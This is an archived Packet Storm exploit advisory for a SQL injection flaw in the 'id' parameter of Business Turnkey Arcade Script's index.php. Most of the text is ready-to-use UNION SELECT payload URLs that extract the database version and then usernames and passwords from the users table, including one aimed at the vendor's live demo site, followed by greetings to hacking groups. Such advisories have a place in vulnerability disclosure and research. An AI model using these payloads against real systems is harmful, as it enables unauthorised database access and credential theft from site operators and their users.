btas-sql.txt

2008-11-29T00:00:00
ID PACKETSTORM:72397
Type packetstorm
Reporter The_5p3ctrum
Modified 2008-11-29T00:00:00

Description

                                        
                                            `----------------Mor0ccan Nightmares----------------  
  
------------------------------  
Script: Turnkey Arcade Script-  
------------------------------  
  
-----------------------------------  
Site: http://www.turnkeyarcade.com-  
-----------------------------------  
  
-----------------------------------------------------------  
Author: The_5p3ctrum <sp3@linuxmail.org> <5p@linuxmail.org>-  
-----------------------------------------------------------  
  
  
-----------------------------------------------------------------------  
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-  
-----------------------------------------------------------------------  
---  
Ex:  
---  
  
http://localhost/index.php?action=play&id=[sql]  
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users  
  
--------  
exploit:  
--------  
  
http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users  
  
-----  
Demo:  
-----  
  
http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users  
  
-------  
Greetz:  
-------  
  
Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...  
  
`